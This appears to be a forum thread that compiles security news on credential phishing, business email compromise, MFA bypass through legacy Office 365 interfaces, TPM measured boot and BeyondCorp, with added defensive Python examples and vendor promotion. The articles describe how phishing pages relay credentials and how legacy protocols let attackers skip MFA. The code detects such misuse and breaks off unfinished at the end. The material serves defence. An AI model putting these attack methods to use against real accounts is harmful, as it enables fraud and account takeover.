The director said that the National Security Council, which plays a significant role in the White House’s cybersecurity strategy, is working to make sure the issue of foreign cyberthreats is a top priority for the White House despite being in a “transition period.”
“Transition” is not an understatement. Trump recently brought on John Bolton to replace H. R. McMaster as his national security adviser. Bolton ushered in a series of changes, including nixing the role of White House cybersecurity coordinator. Eliminating the role has been a contentious issue and lawmakers have urged the White House to reinstate it.
Credential Phishing – Easy Steps to Stymie Hackers
There are so many ways that Wave VSC 2.0 is better than the solutions offered up in this article. Interesting that the author used to work for the Army and doesn't mention Virtual Smart Cards or Windows Hello as an MFA solution. Given the author's initial line of, "I have to admit that I am a big fan of hardware-based tokens," virtual smart cards would seem like his next obvious recommendation.
https://securityboulevard.com/2018/07/credential-phishing-easy-steps-to-stymie-hackers/
Phishing attacks have become a common factor in our daily routines for businesses and in our personal lives. There are many different types of phishing attacks, each of which requires a slightly different defense while having some commonalities as well. This article covers a specific type of attack called credential phishing and ways to protect against it. While you may have heard of this type of attack, many people do not fully understand the different types of credential phishing, their goals, and how to defend against them. Time to remedy that!
Types of Credential Phishing Attacks
Generally speaking, most credential phishing attacks have a common, obvious purpose – to gather credentials from an individual. However, what attackers do with that information and the creativity used in the attack can vary greatly. In some cases, the credentials can be used to gain access to systems or network resources, while in others they can be used to take over bank accounts, social media accounts or email accounts. In any of these cases, the damage the attacker can do can be harmful to the organization or individual, both reputationally and financially.
A couple of months ago, I spent some time in Washington, DC, where I was honored to speak to members of several different House Subcommittees ranging from those focused on financial crimes and terrorism to consumer protection and intelligence services. After one of the briefings, I spent some time speaking with a member of the U.S. Secret Service. He told me a story about a case he just finished working. Sadly, this was a scenario that I already knew too well through others impacted by the same scenario.
In this case, the attacker was able to gain access to an individual’s email account through a credential phishing email. This victim worked in the real estate industry and was working on some reasonably large deals. The attacker stayed quiet and monitored the victim's emails for about a month before springing the attack. In this case, when it was time to transfer the escrow funds, the victim sent the account information for the transfer to the sender. Immediately afterward, the attackers made their move, and from the legitimate account of the victim, sent another email with a “correction” to the account number. The result was about $500,000 wired to the attacker’s bank account in another country, and it happened in the blink of an eye.
The FBI calls this kind of attack Business Email Compromise (BEC), and there are many different variations. This escrow/earnest money transfer attack is just one of many. Attacks diverting funds for invoice payments, false invoices being generated and sent from legitimate accounts, and malware being spread through legitimate, “trusted” accounts are just a few others I have seen. This doesn’t even touch on the CEO fraud versions of this type of attack, which occur when the “CEO” makes an urgent request for a funds transfer or to send tax forms for the employees. These attacks are so lucrative that Trend Micro is expecting the losses to exceed $9 billion by the end of this year, and the FBI had already tallied $5.3 billion in losses back in 2016.
In addition to these types of attacks, if you own the user’s email account, password resets for other types of accounts using that email address become trivial.
Fighting Back Against Credential Phishing
So, how do we fight back against these sorts of attacks? Generally speaking, the most effective countermeasures I have seen are:
1. Training the users to spot these attacks.
2. Using Multi-Factor Authentication (MFA) to secure the accounts.
When it comes to training users to spot these attacks, we need to understand that the days of the Nigerian prince scams are largely behind us. Modern attacks are well designed and can be tough to recognize.
For example, the following credential phishing pages are from the KnowBe4 simulated phishing platform and are indicative of credential phishing pages used in the wild.
As you can see from the examples, these pages are made to look exactly like the real login pages for these services, and they can be easily hosted on any web server. Most of the time, when the user enters the credentials, the page not only captures those credentials, but it also forwards them to the actual login page, which then logs in the user, and they never know that they just gave up their credentials. Even in cases where the user is not automatically logged in, the page will usually just show a “Bad username or password” error, prompting him/her to log in again. Because all of us have mistyped a password before, this typically goes unnoticed and the user thinks they just fat-fingered the keys, once again leaving them oblivious to the harvesting of their credentials.
We must train users (and ourselves) to hover over the link in emails to ensure they are going to where they say they are, and to glance at the URL bar before ever entering login credentials on a page.
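The "hover over the link" advice above is something a mail gateway or a training tool can also check automatically: does the hostname the user sees in the link text match the hostname the href actually points to, and is the target an internationalised (punycode) name that can look like a familiar brand? The following is an added example written for this post, not code from the article or from KnowBe4; the e-mail body it parses is a constructed sample, and the `example-mail.com` / `.test` hostnames are placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample e-mail body (not a real phish): the first link's visible text names one
# host while the href points at another; the second uses a punycode (xn--) hostname.
SAMPLE_EMAIL_HTML = """
<p>Your mailbox is almost full. Please sign in at
<a href="https://login.example-mail.com.account-verify.test/login">https://login.example-mail.com</a>
to keep receiving mail.</p>
<p>Or visit <a href="https://xn--pple-43d.example.test/">apple.example.test</a>.</p>
<p>Support: <a href="https://support.example-mail.com/help">Help Center</a></p>
"""


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._open = None  # [href, accumulated text] while inside an <a>

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._open = [dict(attrs).get("href") or "", ""]

    def handle_data(self, data):
        if self._open is not None:
            self._open[1] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._open is not None:
            self.anchors.append(tuple(s.strip() for s in self._open))
            self._open = None


def extract_links(html_text: str):
    parser = _AnchorCollector()
    parser.feed(html_text)
    return parser.anchors


def host_of(url_or_text: str) -> str:
    """Lowercase hostname of a URL; bare text like 'a.example.test' is tried as https://."""
    candidate = url_or_text if "://" in url_or_text else "https://" + url_or_text
    return (urlsplit(candidate).hostname or "").lower()


def looks_like_url(text: str) -> bool:
    if " " in text:
        return False
    if "://" in text:
        return True
    return "." in text.split("/")[0]


def registrable_domain(host: str) -> str:
    """Crude last-two-labels approximation; a real gateway would use the public suffix list."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def flag_deceptive_links(html_text: str):
    """Return one finding per link whose appearance and destination disagree."""
    findings = []
    for href, text in extract_links(html_text):
        target = host_of(href)
        reasons = []
        if looks_like_url(text) and registrable_domain(host_of(text)) != registrable_domain(target):
            reasons.append("visible text host differs from link target")
        if any(label.startswith("xn--") for label in target.split(".")):
            reasons.append("internationalised (punycode) hostname")
        if reasons:
            findings.append({"href": href, "text": text, "target_host": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in flag_deceptive_links(SAMPLE_EMAIL_HTML):
        print(finding["target_host"], "->", "; ".join(finding["reasons"]))
```

The third link ("Help Center") is not flagged because its visible text makes no claim about a hostname; the check is deliberately narrow so that ordinary marketing links do not drown the real mismatches.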
The second thing we need to do is to enable Multi-Factor Authentication (MFA) on these accounts wherever possible. This means not only do you need to have a username/password combination, but you also need to have another means of authentication. This can be biometrics, a text message to your phone, an authenticator app such as Google Authenticator, or, my favorite, a hardware token like a YubiKey.
When I worked for the U.S. Army, we used something called a Common Access Card (CAC) that contained a set of Personal Identity Verification (PIV) certificates that were tied to Active Directory. These PIV certs allowed us to digitally sign emails, encrypt emails, log in to computers on the domain, and even to control physical access to some areas in the buildings. These devices were a 2-Factor Authentication (2FA) device, as they required you to physically have the card, and also required you to know a PIN number to unlock the certificates on the card. Without one or the other, the operation would fail.
This same MFA principle should be applied to the email accounts of your users, especially the sensitive ones. Here are a few types of MFA to consider:
SMS
Using SMS as a second factor is a topic of debate amongst security professionals as cell phones/SIM cards can fairly easily be spoofed. Personally, I believe that something is better than nothing in this regard, so if this is the only option you have, go ahead and use it.
I will caution you, if you enable SMS as a second factor, avoid using numbers that are tied to services that forward SMS to email. For example, if I enable the SMS second factor in my Google account and have the message sent to my Google Voice number, I run the risk of it being more easily intercepted in email and potentially risk locking myself out of my account. Consider this, if I need the SMS message to get in to my Google account, and it’s being sent to my Google account… It’s just better to send it straight to a phone number. Trust me, I have learned from experience.
Software Authenticators
Another option is software-based authenticators such as Google Authenticator or Duo Security. This application is typically set up using a “shared secret” key that then uses that key to generate a numeric code you can enter into the requesting application. For example, if I set this up as a second factor for my Google account, when I log in, I will be prompted to enter the code. I would open the app on the phone and enter the code for that account. Unlike SMS codes, the One-Time Password (OTP) code generated by this type of application has a short lifespan, typically about one minute, before expiring and generating a new code.
Hardware Tokens
I have to admit that I am a big fan of hardware-based tokens. When I used smart cards in the DoD, I gained a great deal of respect for the abilities of these devices. Typically, these hardware devices will be used to generate OTPs or will store the PIV certificates for that user. As I mentioned previously, these hardware generated codes or PIV certificates are a very strong authentication mechanism.
One problem that plagued smart cards in the DoD was a very high failure rate. Our organization had roughly 300 people using these cards with some users having multiple cards for different accounts. In this organization it was not uncommon to replace 2-3 cards a week due to failure. Smart cards have exposed contacts, much like newer chip-enabled credit cards, and require a special reader to be used.
For these reasons, I don’t recommend smart cards for the typical organization, however there are other options that address these issues.
There are a lot of options for similar devices that can make these same improvements in security while being much easier to use and more reliable. A quick search on Amazon for FIDO U2F will give you some options to peruse. Be sure to pick the ones that support your required authentication protocols and methods.
I have been using a device called a YubiKey which is produced by Yubico. These devices act very much like smart cards but plug directly into a USB port and are much more reliable. I have used these devices to store Active Directory PIV certificates and for OTP generation as well. Some of these devices also allow for Near Field Communication (NFC) connectivity as well as USB connectivity. These support multiple authentication protocols and methods including FIDO2, WebAuthn, U2F, smart card (PIV), Yubico OTP, Code Signing, OpenPGP, OATH-TOTP, OATH, HOTP, and Challenge-Response.
Aside from a second factor for account authentication, one of my preferred use cases for these devices is securing password vaults such as LastPass. This allows for a very secure second factor to lock down the vault and associated passwords. The YubiKey Neo is handy, as it can be used through NFC to unlock the password vault even on cell phones.
Another consideration for these devices is the protection of very high-value accounts in Active Directory. I have used these to secure domain and enterprise administrator accounts using smart card login and PIV certificates, which have been natively supported since Windows 2000. That, however, is a topic for another post.
While these devices are typically pretty rugged and convenient, the cost and the requirement to physically have the device can be an issue. I have left my keychain with the YubiKey at home and left on a trip. This can be very inconvenient and can be a challenge to work around if you do not configure a backup method of authentication.
Setting Up MFA
Securing accounts with multi-factor authentication is becoming much easier as more and more vendors add native support for the technologies. Twitter, Facebook, Office 365, Dropbox, GitHub, Google, and many others already allow you to secure your accounts with MFA. Below are a few examples of what these pages look like when enabling MFA.
Summary
Credential phishing and BEC attacks are continuing to cripple organizations across the globe. The attacks are well planned and executed and often very stealthy. Combining high-quality end user training and multi-factor authentication can significantly reduce the risk of damages resulting from a successful credential phish. While this is not a solution to all of the issues surrounding credential phishing, requiring that additional layer of authentication that is tough for the attackers to obtain, can significantly reduce the risk of damage if a user is tricked into giving up their username and password.
The balance between usability and security is always tricky, but the industry as a whole is making it less painful when adding more layers of security. Therefore, review the available options for multi-factor authentication, especially for high value accounts and especially for all email accounts, and your organization as well as you as an individual should enable this additional security wherever possible. Strongly consider the addition of a password vault system as well, which can reduce password reuse across sites and allows for quick, easy password changes.
While nothing is 100% secure, most of these setups are extremely difficult to break. Any determined attacker can eventually get their target. However, these simple measures go a very long way in helping you rise above being the low hanging fruit, making the bad guys simply go on to an easier mark.
Two-factor auth totally locks down Office 365? You may want to check all your services...
A great solution to the problem below. imo.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.theregister.co.uk/2018/07/13/2fa_o365_bypass_attacks/
A network's only as strong as its weakest link or worker
Hackers can potentially obtain access to Microsoft Office 365 emails and calendars even if multi-factor-authentication is in place, we were warned this week.
Cybercrooks are able to force their way into corporate Office 365 accounts, bypassing single sign-on or multi-factor authentication, by targeting older systems that aren't well protected, email security biz Proofpoint has argued.
The trick, we're told, is to target legacy services that use weak or known passwords, are not secured behind multi-factor-authentication, and, once commandeered, can be used to poke around inside a corporate structure. If you don't know a target's password, it could be phished via email or instant message.
This all may seem obvious, but apparently some people are being stung by it.
"The current wave of attacks mostly goes after Exchange Web Services and ActiveSync," said Ryan Kalember, Proofpoint's senior vice president of cybersecurity strategy, earlier this week. "A little real-time phishing gets mixed in, but is usually not necessary."
Real-world examples
For example, Proofpoint said it recently saw an attacker access the Office 365 account of the chief exec of a 15,000-user financial services and insurance firm. The hacker viewed the CEO's emails and calendar in order to sniff out an opportunity to run a sneaky scam.
At the same time the chief exec was in scheduled meetings with suppliers, the intruder used the compromised account to send an email to the chief financial officer asking for funds to be shifted. The unnamed financial services firm lost $1m over the course of several transfers, it is claimed.
Compromised Office 365 accounts in a 75,000-user real-estate investment biz were used to run another scam. Five executives, including some regional general managers, had their accounts compromised. With access to their Office 365 email, attackers managed to change the ABA routing numbers for corporate funds. The company lost over $500,000 as a result, according to Proofpoint.
By the most remarkable of coincidences, the security shop has released something called Proofpoint Cloud Account Defense (CAD) to detect and proactively protect against compromised Microsoft Office 365 accounts. Kalember explained the need for additional layers of defenses.
"It's really hard for most orgs to cover all the interfaces to Exchange with MFA [multi-factor authentication]," Kalember told El Reg.
"Particularly with EWS [Exchange Web Services], you need to be 1) fully migrated to O365, 2) use Microsoft's own MFA, and 3) in Modern Authentication mode. The tech can't support native iOS/Android mail clients, etc."
In other words, you may think you're fully protected – but maybe you should double check, and increase defenses for all service interfaces, particularly concerning Exchange Web Services. Save yourself some pain in the future. ®
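The gap Kalember describes is a coverage gap, not a flaw in MFA itself: an account can be fully protected on the browser and modern-auth clients while a legacy interface still accepts username and password alone. The check a defender wants is therefore "which accounts that normally complete MFA have also been reached through an interface where MFA never ran, and from where?" The block below is an added example written for this post, not Proofpoint's or Microsoft's code; the sign-in records and the protocol labels are constructed stand-ins for whatever your tenant's sign-in log actually exports.

```python
from collections import defaultdict

# Interfaces that, in the scenario the article describes, authenticate with password only.
# Labels are illustrative, not a vendor's field values.
LEGACY_PROTOCOLS = {"EWS-BasicAuth", "ActiveSync-BasicAuth", "IMAP4", "POP3", "SMTP-Auth"}
MODERN_PROTOCOLS = {"Browser", "ModernAuth-Outlook", "MobileApp-ModernAuth"}

# Constructed sign-in records (not real telemetry). IPs are from documentation ranges.
SAMPLE_SIGNINS = [
    {"user": "ceo@corp.example", "protocol": "Browser", "mfa": True, "result": "success", "ip": "203.0.113.10"},
    {"user": "ceo@corp.example", "protocol": "EWS-BasicAuth", "mfa": False, "result": "success", "ip": "198.51.100.7"},
    {"user": "cfo@corp.example", "protocol": "ModernAuth-Outlook", "mfa": True, "result": "success", "ip": "203.0.113.10"},
    {"user": "gm1@corp.example", "protocol": "ActiveSync-BasicAuth", "mfa": False, "result": "success", "ip": "198.51.100.7"},
    {"user": "gm1@corp.example", "protocol": "ActiveSync-BasicAuth", "mfa": False, "result": "failure", "ip": "198.51.100.9"},
    {"user": "analyst@corp.example", "protocol": "IMAP4", "mfa": False, "result": "failure", "ip": "198.51.100.7"},
]


def legacy_successes(signins):
    """Successful sign-ins over interfaces where no second factor was completed."""
    return [
        s for s in signins
        if s["protocol"] in LEGACY_PROTOCOLS and s["result"] == "success" and not s["mfa"]
    ]


def mfa_gap_accounts(signins):
    """Accounts that do complete MFA on modern clients yet were also reached through a
    password-only interface: the 'you think you are protected' case from the article."""
    modern_mfa = {
        s["user"] for s in signins
        if s["protocol"] in MODERN_PROTOCOLS and s["mfa"] and s["result"] == "success"
    }
    legacy = {s["user"] for s in legacy_successes(signins)}
    return sorted(modern_mfa & legacy)


def legacy_source_summary(signins):
    """Legacy-protocol attempts (success or failure) per source IP. One address touching
    several accounts over legacy interfaces is the password-spray shape to look for."""
    counts = defaultdict(int)
    for s in signins:
        if s["protocol"] in LEGACY_PROTOCOLS:
            counts[s["ip"]] += 1
    return dict(counts)


def accounts_to_review(signins):
    """Every account that got in without MFA: candidates for a password reset and for
    disabling legacy protocols on the mailbox."""
    return sorted({s["user"] for s in legacy_successes(signins)})


if __name__ == "__main__":
    print("MFA gap accounts:", mfa_gap_accounts(SAMPLE_SIGNINS))
    print("legacy attempts by source:", legacy_source_summary(SAMPLE_SIGNINS))
    print("review:", accounts_to_review(SAMPLE_SIGNINS))
```

On the constructed data the CEO account is the one that matches the article's pattern exactly (MFA in the browser, password-only success over EWS), and one source address accounts for three legacy attempts across three users. The remediation the article points to is the same regardless of tooling: turn the legacy interfaces off for mailboxes that do not need them, and alert on any successful legacy sign-in for those that do.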
From computers to mobile - The TPM could be ready to shine!
AMI @AMI_PR has added TPM support for Arm-based systems currently running AMI's Aptio® V UEFI firmware. Users can expect the ability to better secure their systems and the information stored within them. http://ow.ly/O2Rc30kUnhr
— Trusted Computing (@TrustedComputin) July 11, 2018
see post 245219 as well.
American Megatrends Adds TPM Support on Arm-based Systems Running Aptio® V UEFI Firmware
see wavesys.com for Wave Endpoint Monitor
https://ami.com/en/news/press-releases/american-megatrends-adds-tpm-support-on-armbased-systems-running-aptio-v-uefi-firmware/
Wednesday: May 2, 2018
NORCROSS, GEORGIA: - American Megatrends Inc. (AMI), a global leader in BIOS and UEFI firmware, server and remote management tools, data storage products and unique solutions based on the Linux® and Android™ operating systems, is pleased to announce support for TPM on Arm®-based systems running AMI’s flagship Aptio® V UEFI Firmware.
The Trusted Platform Module (TPM) is defined in the TPM Main specification created by the Trusted Computing Group, which enables trust in computing platforms. TPM can be used to measure the code that will be executed (known as measured boot), authenticate and secure platforms using passwords, certificates, digital signatures and/or encryption keys. Incorporating TPM provides an extra layer of security to ensure that important information is not prone to outside software attacks and/or unauthorized updates.
Previously, AMI only provided TPM support for x86 platforms. With the growing need to extend TPM support for additional platforms, AMI has added TPM support for Arm-based systems currently running AMI's Aptio® V UEFI firmware. Users can expect the ability to better secure their systems and the information stored within them. The added TPM support for Arm-based systems includes features specifically for the Arm architecture such as TPM driver support within Arm® TrustZone® technology and Linux OS support. The Arm TrustZone TPM Firmware can be accessed by the BIOS and OS via the Command Response Buffer interface using Secure Monitor calls. Other generic features supported by TPM include cryptographic algorithms and measurement of SecureBoot variables.
American Megatrends and Wave to Extend UEFI Support in Windows 8 for BIOS Malware Detection
Friday: February 24, 2012
https://ami.com/en/news/press-releases/american-megatrends-and-wave-to-extend-uefi-support-in-windows-8-for-bios-malware-detection/
Central to Windows 8 is the use of Aptio®, AMI’s solution for UEFI (Unified Extensible Firmware Interface), which represents an overhaul of the computer boot environment, while still bearing similarities to the legacy BIOS (Basic Input Output System) it replaces. The UEFI specification introduces advanced firmware features defining boot and runtime protocols for communications between services, device drivers and offers a standard interface to the operating system. Providing standardized access to boot data optionally stored on either NAND flash or on a hard drive, Aptio provides more space for boot-time diagnostics and running utilities. The result is dramatically faster boot-up times and better performance.
Windows 8 takes advantage of UEFI secure boot architecture to enhance the operating system’s security capabilities. Secure boot allows only signed software to run on the device, adds cryptographic checks to each stage of the boot process and asserts the integrity of all the software images that are executed to prevent unauthorized, modified software from running. Wave solutions report on the execution of the secure boot and verify that anti-malware software has been launched before any third-party boot drivers to prevent malware from bypassing inspection.
Building a “chain of trust” requires the collaboration of multiple partners. AMI provides the first step in the trust chain by assuring that the BIOS components are registered and signed prior to the delivery of the platform. As the computer boots, each component reports its status to the Trusted Platform Module (TPM), which securely records the status measurements. This provides a critical first step that sets the stage for a more trustworthy computing environment.
Wave constitutes the next link in the trust chain with solutions designed to assure that the integrity of the secure boot is reported and attested to the enterprise network or Cloud service. Wave Endpoint Monitor, currently deployed in beta testing, uses the TPM to report on the success of the secure boot and leverages the chip to prove that the process has executed correctly. Endpoint Monitor can then prove to a Cloud service or to an enterprise application that the PC has booted in a known, good state. If a platform is compromised, IT can determine which machine is infected, and take steps to prevent it from accessing sensitive systems to ensure that critical systems and data remain safe.
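The measured-boot mechanism behind both press releases (each boot component is hashed into a TPM PCR, and a verifier later replays the event log against the PCR values the chip reports) can be shown end to end. The following is an added example, not AMI's or Wave's code: the event descriptions, digests and "golden" values are constructed, and simulate_tpm_quote stands in for a real TPM quote.

```python
import hashlib
from dataclasses import dataclass

# SHA-256 PCR banks start at all zeros after a platform reset.
PCR_INIT = b"\x00" * 32


def pcr_extend(pcr_value: bytes, digest: bytes) -> bytes:
    """TPM 2.0 extend: PCR_new = H(PCR_old || digest).

    The operation is one-way, so a component cannot "un-measure" itself once
    the firmware has recorded it; only the whole sequence reproduces the value.
    """
    return hashlib.sha256(pcr_value + digest).digest()


@dataclass(frozen=True)
class MeasurementEvent:
    pcr_index: int
    description: str  # which component or variable was measured
    digest: bytes     # SHA-256 of the measured code or data


def replay_event_log(events) -> dict:
    """Recompute every PCR from the event log, exactly as a verifier does."""
    pcrs = {}
    for ev in events:
        prev = pcrs.get(ev.pcr_index, PCR_INIT)
        pcrs[ev.pcr_index] = pcr_extend(prev, ev.digest)
    return pcrs


def attest_known_good(events, quoted_pcrs, golden_pcrs):
    """Return (ok, reasons).

    quoted_pcrs: the PCR values the TPM signs in a quote (trusted, chip-backed).
    events:      the untrusted event log the platform ships alongside the quote.
    golden_pcrs: the enterprise's expected values for a known-good build.
    """
    reasons = []
    replayed = replay_event_log(events)
    for idx, golden in golden_pcrs.items():
        if quoted_pcrs.get(idx) != replayed.get(idx):
            reasons.append(f"PCR{idx}: event log does not reproduce the quoted value "
                           "(log tampered or truncated)")
        elif quoted_pcrs[idx] != golden:
            culprits = [ev.description for ev in events if ev.pcr_index == idx]
            reasons.append(f"PCR{idx}: differs from golden value; components measured: {culprits}")
    return (not reasons, reasons)


def _d(s: str) -> bytes:
    """Constructed digest of a stand-in component image."""
    return hashlib.sha256(s.encode()).digest()


# Constructed event log of a known-good boot (PCR indices follow the common
# UEFI convention: 0 = firmware code, 4 = boot manager, 7 = Secure Boot policy).
GOOD_EVENTS = [
    MeasurementEvent(0, "UEFI firmware volume", _d("firmware-core-v1")),
    MeasurementEvent(7, "Secure Boot PK/KEK/db variables", _d("secureboot-db-v1")),
    MeasurementEvent(7, "Secure Boot policy: enabled", _d("secureboot-on")),
    MeasurementEvent(4, "Boot manager / OS loader", _d("bootloader-v1")),
]
# Golden values would be captured once from a reference machine; here we derive them.
GOLDEN_PCRS = replay_event_log(GOOD_EVENTS)

# Constructed tampered boot: the OS loader image was replaced.
TAMPERED_EVENTS = [
    ev if ev.pcr_index != 4 else MeasurementEvent(4, ev.description, _d("bootloader-bootkit"))
    for ev in GOOD_EVENTS
]


def simulate_tpm_quote(events) -> dict:
    """Stand-in for the TPM: returns the PCR values the real chip would sign."""
    return replay_event_log(events)


if __name__ == "__main__":
    print(attest_known_good(GOOD_EVENTS, simulate_tpm_quote(GOOD_EVENTS), GOLDEN_PCRS))
    # Modified loader: quote is honest, so the golden comparison catches it.
    print(attest_known_good(TAMPERED_EVENTS, simulate_tpm_quote(TAMPERED_EVENTS), GOLDEN_PCRS))
    # Attacker rewrites the log to look clean, but cannot change what the TPM quotes.
    print(attest_known_good(GOOD_EVENTS, simulate_tpm_quote(TAMPERED_EVENTS), GOLDEN_PCRS))
```

The third case is the reason the chip matters: a compromised OS can edit the event log it hands over, but the PCR values in a quote are signed by the TPM, so the replay no longer matches.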
“Securing the computer from power on is critical to the defense of intellectual property and the corporate infrastructure,” remarked S. Shankar, President and CEO of American Megatrends. “AMI is pleased to provide Microsoft with the foundation of security for Windows 8, and to work with Wave to extend security capabilities that wouldn’t have been possible in a legacy environment.”
Steven Sprague, Wave’s CEO commented, “AMI and PC manufacturers offer great assurance that the UEFI components are trusted when delivered to the customer. Wave provides IT with a greater level of knowledge and trust in the boot process and assurances that only known devices are on the network. Knowing the identity of the machine and assuring the health of its BIOS represent significant strides forward in combating advanced persistent threats.”
AMI has spent the last year supporting the launch of Windows 8 by ensuring that AMI’s Aptio UEFI firmware is in full compliance with the latest UEFI specification, UEFI 2.3.1. New features include pre-OS security, speed and secure boot. AMI is also working with PC OEMs, developers and partners such as Wave by providing UEFI development PCs for testing within a Windows 8 ecosystem. AMI has worked in partnership with Microsoft to develop this system in order to facilitate the rapid development of Windows 8 throughout the entire developer community. These new UEFI development PCs are powered by the latest version of Aptio, version 4.6.5.1, which not only offers full support for Windows 8, but also adds support for the latest UEFI specifications, UEFI 2.3.1 and PI 1.2. This makes the latest features of the UEFI specification, such as Secure Boot, UEFI boot mode, fully localizable user interface and more, available to manufacturers in a production-ready UEFI BIOS. Notably, this development system will be the first PC on the market with full UEFI 2.3.1 support, allowing for a complete Windows 8 experience.
In preparation for Windows 8 availability, Wave is using some of the capabilities of the TPM to enable an enterprise infrastructure to support the features in Windows 8 that take advantage of UEFI capabilities. Enterprises stand to benefit from a tool that can detect rootkits, assure the core capabilities of a platform and establish very strong device identity—capabilities that have been missing for the last 20 years and critical to establishing a more trustworthy computing environment.
Phone in the right hand? You're a hacker!
How effective, really, is continuous monitoring/automation and assuming all users in the network are hostile (Beyond Corp) vs. only known devices being allowed on certain parts of the network? The moat approach (anti virus and firewalls) isn't very effective either. imo. Wave's website has the following excerpt:
https://www.wavesys.com/solutions
Much of the complexity, stress, and expense of data protection stems from hanging on to a failed, 20th-century approach to the problem. Namely, piling on layers of software in an attempt to keep the bad guys and their viruses out. But there is no “in” to keep them out of anymore. Consider today’s increasingly mobile workforce, the proliferation of personal devices, and the growing use of web applications—all of which cyber criminals have learned to take advantage of.
The Wave alternative is to start with the device. The security is built in—part of the hardware—not added on. With the device as your foundation, you have unprecedented yet straightforward control over exactly who has access to your data, with what devices, over what networks, which eliminates much of that complexity, stress, and expense. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
https://www.bbc.com/news/technology-44438808
Hackers are finding it too easy to circumvent traditional cyber defences, forcing businesses to rethink their security strategies. Many firms are now harnessing big data and adopting cutting edge verification checks. In fact, some can even identify you by how quickly you type your computer keys, or how you hold your mobile phone.
In these days of regular space travel, nanotechnology and quantum computers it is easy to believe we live in an age plucked from the pages of a science-fiction novel.
But there are some aspects of this shiny, computer-powered era that look more feudal than futuristic.
Consider the way many organisations protect themselves and their staff from cyber-attacks.
Many approach cyber-security like a medieval king would have tackled domestic security - by building a castle to protect themselves, says Dr Robert Blumofe, a senior manager at cloud services firm Akamai.
The high walls, moat and drawbridge are the security tools, anti-virus and firewalls they use to repel the barbarians at the gates trying to breach their cyber defences.
"But now," Dr Blumofe says, "that castle metaphor is really starting to break down."
Outer defences
The first issue is mobility. Digital fortifications worked well when all staff sat at desks, used desktop computers and were concentrated in a few buildings.
But now many work from home, airports or coffee shops and use their laptops, tablets and phones on the go, to work at all times of day.
The second problem, Dr Blumofe says, is that many firms wrongly assume that those inside their castle walls can be trusted and are "safe".
This leaves many firms dangerously exposed, agrees John Maynard, European head of cyber-security for Cisco.
"Typically once attackers have penetrated a trusted network they find it is easy to move laterally and easy to get to the crown jewels.
"That's because all the defences point outward. Once on the inside there is usually little to stop attackers going where they want to."
Tumbling walls
In a bid to get beyond this outdated thinking many organisations have torn down the old castle walls in favour of a model known as the "Beyond Corp" approach.
It was pioneered by Google in response to a series of cyber-attacks in 2009 called Aurora orchestrated by China-backed hackers. The attackers went after Google as well as Adobe, Yahoo, Morgan Stanley, Dow Chemical and many other large firms.
According to Mr Maynard, Beyond Corp assumes every device or person trying to connect to a network is hostile until they are proven otherwise.
And it obtains this proof by analysing external devices, how they are being used and what information they are submitting.
This encompasses obvious stuff such as login names and passwords, as well as where someone logs in from; but it also relies on far more subtle indicators, says Joe Pindar, a security strategist at Gemalto.
"It can be how quickly do you type the keys, are you holding the device in your right or left hand. How an individual uses a device acts as a second layer of identity and a different kind of fingerprint."
Gathering, storing and analysing all that data on those individual quirks of usage was the type of big data problem only a tech-savvy company such as Google could tackle at the time of the Aurora attacks, says Mr Pindar.
However, as familiarity with big data sets has spread, many more big firms are adopting the Beyond Corp approach when organising their digital defences, he says.
One big advantage is that Beyond Corp turns a firm's network into an active element of defence, says Mr Maynard from Cisco.
"In the castle and moat approach the network was passive... But Beyond Corp involves continuous monitoring where you are constantly using the network as a sensor or a way to get telemetry about what's going on."
The analysis done when users join a network makes it much easier to spot when attackers are trying to get access. That's because the authentication step will flag any anomalies meaning security staff will find out quickly that something suspicious is going on. Anything other than normal login behaviour will stand out.
Faster detection
It can also mean a "significant reduction" in time to detect threats, says Mr Maynard.
"The industry average is about 100 days to spot threats. With Beyond Corp you should be down to hours not days."
In addition, Beyond Corp can "limit the blast radius" if a breach does happen, says Stephen Schmidt, chief security officer at Amazon's AWS cloud service.
This is because it usually involves dividing up a company's internal network so users only get access to applications they are approved to use.
The mass of data gathered on users, their devices and the way they act once they have connected may appear bewildering to many companies.
However, advances in automation are increasingly helping them keep a handle on the millions of events that now occur on their systems.
"If you are expecting to secure your estate by having humans watch TV screens you are probably going to be too late to spot it," says Mr Schmidt. "Human reactions are always going to be much slower than automation."
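The access model the article describes (every request judged on device state, identity and behaviour rather than on being "inside", with each application requiring its own trust level so a breach has a small blast radius) can be written down as a small policy engine. This is an added example, not Google's BeyondCorp implementation or any vendor's code; the trust tiers, application list and user baseline are constructed.

```python
from dataclasses import dataclass


@dataclass
class Device:
    device_id: str
    managed: bool            # enrolled in the corporate inventory
    attested_healthy: bool   # boot/health attestation passed (e.g. TPM-backed)
    patch_age_days: int


@dataclass
class UserBaseline:
    username: str
    usual_countries: frozenset
    usual_hours: range       # local hours the user is normally active
    usual_devices: frozenset


@dataclass
class Request:
    username: str
    device: Device
    app: str
    country: str
    hour: int


# Constructed per-application trust tier: higher means more is demanded of the
# device. Only the one application is granted, never "the network".
APP_TIERS = {"wiki": 1, "crm": 2, "finance-ledger": 3}


def device_tier(d: Device) -> int:
    """Map device state to a trust tier (0 = unknown device)."""
    if not d.managed:
        return 0
    if not d.attested_healthy:
        return 1
    if d.patch_age_days > 30:
        return 2
    return 3


def anomalies(req: Request, baseline: UserBaseline) -> list:
    """Behavioural signals compared with what this user normally does."""
    flags = []
    if req.country not in baseline.usual_countries:
        flags.append(f"new country {req.country}")
    if req.hour not in baseline.usual_hours:
        flags.append(f"unusual hour {req.hour:02d}:00")
    if req.device.device_id not in baseline.usual_devices:
        flags.append(f"unseen device {req.device.device_id}")
    return flags


def decide(req: Request, baseline: UserBaseline):
    """Return ('allow' | 'step-up' | 'deny', reasons).

    Network location is deliberately not an input: a request from the office
    LAN is judged exactly like one from a coffee shop.
    """
    required = APP_TIERS.get(req.app)
    if required is None:
        return ("deny", ["unknown application"])
    tier = device_tier(req.device)
    flags = anomalies(req, baseline)
    reasons = flags + [f"device tier {tier}, app requires {required}"]
    if tier < required:
        return ("deny", reasons)          # device cannot be trusted for this app
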